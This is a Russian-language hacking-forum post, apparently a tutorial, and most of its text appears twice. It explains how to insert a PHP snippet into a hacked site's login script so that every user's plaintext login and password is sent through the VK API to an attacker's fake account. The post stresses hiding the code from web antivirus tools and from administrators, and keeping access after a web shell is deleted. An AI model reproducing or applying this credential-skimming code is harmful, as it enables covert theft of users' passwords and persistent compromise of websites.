M
MrFear41
Original poster
Сижу я тут, и меня осенило, что можно сливать логины и пароли со взломанных сайтов без расшифровки паролей(пусть они в БД хоть как будут запаролены
).
При этом даже если ваш шелл удалят, вы все равно сможете получать актуальные пароли(даже если их будут менять каждую минуту), в том числе и новорегов!
Заинтригованы?
Ну, погнали!
Что нам нужно:
- фейковый акк в вк (хоть пустой, пофиг). А лучше два.
- Небольшое знание PHP
- Все
Итак, вот мы взломали сайт, залили шелл, но БД весит несколько ГБ, да и шифр хрен знает какой, и вообще нет желания разбираться с этим. И тут вы подумали, что админ шелл может найти и удалить, а доступ к логинам и паролям терять не хочется. В том числе и к новорегам.
Тут нам поможет наш VK. Мы допишем немного форму авторизации, чтобы логины и пароли прилетали к нам в личные сообщения, как только кто-то авторизовывается.
В чем плюсы способа?
- эту доработку не спалит ни один WEB антивирус(AI-BOLIT допустим)
- в большом коде сложно заметить этот кусок
- у нас на руках всегда актуальные данные
Короче, хватит болтовни!
Приступаем!
Заходим на свой фейк, переходим по этой
Даем доступ, сверху в адресной строке копируем наш Access_token
Теперь ищем на сайте PHP файл, отвечающий за вывод формы авторизации (бывает в index.php или в login.php чаще всего, но может быть и в других местах)
Теперь берем код, который я написал ниже и вставляем его куда нибудь в тело скрипта авторизации, в то место, где много кода (чтобы не так выделялось)
В переменную $token = ''; в кавычки вставляем наш токен от фейковой страницы
В строке:
$post = file_get_contents ('
Меняем 12345 на ID вашей страницы в вк, на которую будут приходить пароли(обязательно циферный!)
Теперь самое сложное!
Нужно найти в коде сайта 2 переменные, которые хранят логин и пароль.
Допустим на сайте логин хранится в переменной $logauth а пароль в $passauth
Тогда нам нужно наш код ( $text = "$Log:$Pass"; )
Изменить на $text = "$logauth:$passauth";
Все, сохраняем и пробуем авторизоваться на сайте. Данные пришли? Великолепно! Значит вы все сделали правильно!
Ну, а для знающих PHP дополнить код, если конечно им нужно, они смогут сами!
А для незнающих этого более чем достаточно, чтобы получать всегда логины и пароли в чистом виде!
С вами был как обычно MrFear41. Ставьте "мне нравится" если вам понравиалсь моя статья!
При этом даже если ваш шелл удалят, вы все равно сможете получать актуальные пароли(даже если их будут менять каждую минуту), в том числе и новорегов!
Заинтригованы?
Ну, погнали!
Что нам нужно:
- фейковый акк в вк (хоть пустой, пофиг). А лучше два.
- Небольшое знание PHP
- Все
Итак, вот мы взломали сайт, залили шелл, но БД весит несколько ГБ, да и шифр хрен знает какой, и вообще нет желания разбираться с этим. И тут вы подумали, что админ шелл может найти и удалить, а доступ к логинам и паролям терять не хочется. В том числе и к новорегам.
Тут нам поможет наш VK. Мы допишем немного форму авторизации, чтобы логины и пароли прилетали к нам в личные сообщения, как только кто-то авторизовывается.
В чем плюсы способа?
- эту доработку не спалит ни один WEB антивирус(AI-BOLIT допустим)
- в большом коде сложно заметить этот кусок
- у нас на руках всегда актуальные данные
Короче, хватит болтовни!
Приступаем!
Заходим на свой фейк, переходим по этой
Даем доступ, сверху в адресной строке копируем наш Access_token
Теперь ищем на сайте PHP файл, отвечающий за вывод формы авторизации (бывает в index.php или в login.php чаще всего, но может быть и в других местах)
Теперь берем код, который я написал ниже и вставляем его куда нибудь в тело скрипта авторизации, в то место, где много кода (чтобы не так выделялось)
Код:
$text = "$Log:$Pass";
$token = '';
$post = file_get_contents ('https://api.vk.com/method/messages....='.urlencode($text).'&access_token='.$token);
(т.к. форум автоматически линкует ссылки, жмите тут ПКМ и копировать ссылку, ну и вставьте ее хоть в блокнот)
В строке:
$post = file_get_contents ('
Меняем 12345 на ID вашей страницы в вк, на которую будут приходить пароли(обязательно циферный!)
Теперь самое сложное!
Нужно найти в коде сайта 2 переменные, которые хранят логин и пароль.
Допустим на сайте логин хранится в переменной $logauth а пароль в $passauth
Тогда нам нужно наш код ( $text = "$Log:$Pass"; )
Изменить на $text = "$logauth:$passauth";
Все, сохраняем и пробуем авторизоваться на сайте. Данные пришли? Великолепно! Значит вы все сделали правильно!
Ну, а для знающих PHP дополнить код, если конечно им нужно, они смогут сами!
А для незнающих этого более чем достаточно, чтобы получать всегда логины и пароли в чистом виде!
С вами был как обычно MrFear41. Ставьте "мне нравится" если вам понравиалсь моя статья!